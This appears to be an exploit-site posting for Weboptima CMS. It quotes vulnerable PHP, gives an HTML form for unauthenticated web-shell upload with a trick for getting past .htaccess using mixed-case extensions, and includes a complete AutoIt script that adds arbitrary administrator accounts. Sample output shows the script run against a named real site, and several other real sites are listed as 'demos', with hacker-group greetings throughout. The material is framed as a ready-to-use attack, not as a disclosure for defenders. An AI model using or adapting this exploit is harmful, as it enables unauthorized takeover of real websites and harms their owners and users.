Weboptima CMS Add Administrator / Shell Upload

`#cs  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm AkaStep member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
weboptima_cms_remote_add_admin_shell_upload.au3  
  
============================================  
Vulnerable Software: Weboptima CMS  
Vendor: http://weboptima.am/  
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.  
Both Exploits are available(HTML exploit to upload shell)  
And Autoit Exploit to add arbitrary admin accounts to target site.  
More detailts below.  
============================================  
  
Few DEMOS:  
http://navasards.am  
http://olivergroup.am  
http://iom.am  
http://bluefly.am  
http://invest-in-armenia.com  
http://decart.am  
http://armgeokart.am/  
  
============================================  
About Vulns:  
  
1'ST vulnerability is REMOTE SHELL UPLOAD:  
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.  
Vulnerable code:  
  
//cms/upload.php  
=============SNIP BEGINS======================  
<?php  
$path="../uploades";  
if(!file_exists($path))  
{  
mkdir($path, 0777);  
}  
  
if(isset($_GET['name']))  
{  
unlink($path."/".$_GET['name']);  
$letter = $_GET['letter'];  
$selTypey = $_GET['selType'];  
header("Location: upload.php?letter=$letter&selType=$selTypey");  
}  
?>  
<?php include_once("start.php"); ?>  
<div align="center">  
<table align="center">  
<tr>  
<td colspan="3" align="center"><span class="title">Կցված ֆայլեր</span></td>  
</tr>  
<tr>  
<td>  
<?php  
if(isset($_POST['sub']))  
{  
$fileName = $_FILES["up_file"]['name'];  
$masSimbl = array('&','%','#');  
if(in_array($fileName[0], $masSimbl))  
{  
echo $fileName[0].' սիմվոլով սկսվող անուն չընտրել';  
}  
else  
{  
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);  
}  
}  
?>  
========================SNIP ENDS=================  
  
  
  
  
Simple HTML exploit to upload your shell:  
  
<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">  
<input type="file" name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>  
  
After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php  
  
NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).  
This is not problem just upload your shell like:  
  
myshell.PhP  
or  
myshell.pHp  
  
OWNED.  
  
  
  
2'nd vulnerability is: REMOTE ADD ADMIN  
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.  
Vulnerable Code:  
//cms/loginPass.php  
Notice: header() without exit;*Script continues it's execution.*  
==================SNIP BEGINS=========  
<?php  
session_start();  
if($_SESSION['status_shoping_adm']!="adm_shop") {  
header("Location: index.php");  
}  
require_once('../myClass/DatabaseManeger.php');  
require_once("../myClass/function.php");  
  
$_POST = stripSlash($_POST);  
$_GET = stripSlash($_GET);  
?>  
<?php  
$error = "";  
//And more stuff  
==================SNIP ENDS=============  
  
And here is exploit written in Autoit to exploit  
this vulnerability and add admin to target site.  
  
  
Exploit usage(CLI):  
  
weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere  
  
  
##############################################################  
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)  
Usage: weboptima.exe http://site.tld username password  
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]  
[@@@] Vuln & Exploit By AkaStep [@@@]  
##############################################################  
[+] GETTING INFO ABOUT CMS [+]  
[*] GOT Response : Yes! It is exactly that we are looking for! [*]  
  
##################################################  
Trying to add new admin:  
To Site:www.decart.am  
With Username: AzerbaijanBlackHatzWasHere  
With Password: AzerbaijanBlackHatzWasHere  
##################################################  
  
##################################################  
Exploit Try Count:1  
##################################################  
Error Count:0  
##################################################  
  
##################################################  
Exploit Try Count:2  
##################################################  
Error Count:0  
##################################################  
Count of errors during exploitation : 0  
  
##################################################  
[*] Yaaaaa We are Going To Travel xD [*]  
Try to login @  
Site: decart.am/cms/index.php  
With Username: AzerbaijanBlackHatzWasHere  
With Password: AzerbaijanBlackHatzWasHere  
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!  
OTHERWISE YOU WILL UNABLE TO LOGIN!  
##################################################  
[*] Exit [*]  
##################################################  
  
  
#ce  
#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#NoTrayIcon  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _  
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _  
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _  
@CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _  
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);  
ConsoleWrite(@CRLF & $exploitname & @CRLF)  
  
$method='POST';  
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);  
Global $count=0,$error=0;  
$cmsindent='kcaptcha'; # We will use it to identify CMS #;  
$adminpanel='/cms/index.php';  
  
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;  
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';  
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF  
if $CmdLine[0] <> 3 Then  
MsgBox(64,"",$msg_usage);  
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
exit;  
EndIf  
  
  
if $CmdLine[0]=3 Then  
$targetsite=$CmdLine[1];  
$username=$CmdLine[2];  
$password=$CmdLine[3];  
EndIf  
  
  
  
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then  
ConsoleWrite('Are you kidding me?');  
Exit;  
EndIf  
  
  
HttpSetUserAgent($useragent)  
$doublecheck=InetGet($targetsite,'',1);  
if @error Then  
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)  
Exit;  
EndIf  
  
  
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);  
sleep(Random(1200,2500,1));  
  
  
  
HttpSetUserAgent($useragent);  
$sidentify=_INetGetSource($targetsite & $adminpanel,True);  
  
  
  
  
if StringInStr($sidentify,$cmsindent) Then  
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)  
Else  
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)  
$error+=1;  
EndIf  
  
  
  
  
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')  
  
  
priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#  
  
Func priv8($targetsite,$username,$password,$count,$error)  
  
  
$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;  
  
  
Global $sAddress = $targetsite  
  
$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;  
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & $triptrop;  
if $count <=1 then ConsoleWrite($whatcurrentlywedo)  
  
$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;  
ConsoleWrite($doitnicely);  
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";  
  
  
if $error>=2 OR $count>=2 Then  
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)  
  
if int($error)=0 then  
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _  
$username & @CRLF & 'With Password: ' & $password & @CRLF & _  
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _  
' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);  
exit;  
Else  
  
ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _  
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _  
'[*] May be you are Lucky;) [*]' & _  
@CRLF & 'Try to login @ ' & @CRLF & _  
'Site: ' & $targetsite & $adminpanel & @CRLF & _  
'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);  
  
EndIf  
exit;  
  
EndIf  
  
  
  
Global $hOpen = _WinHttpOpen($useragent);  
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)  
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');  
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")  
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")  
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")  
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")  
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;  
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;  
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")  
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")  
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));  
_WinHttpSendRequest($hRequest, -1, $sPostData)  
_WinHttpReceiveResponse($hRequest)  
  
Global $sHeader, $sReturned  
If _WinHttpQueryDataAvailable($hRequest) Then  
$sHeader = _WinHttpQueryHeaders($hRequest)  
Do  
$sReturned &= _WinHttpReadData($hRequest)  
Until @error  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(Random(10000,20000,1));  
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;  
  
Else  
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;  
  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
  
$targetsite=StringMid($targetsite,5,StringLen($targetsite))  
Sleep(Random(10000,20000,1));  
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#  
  
EndIf  
  
EndFunc;=> priv8();  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
  
#ce  
`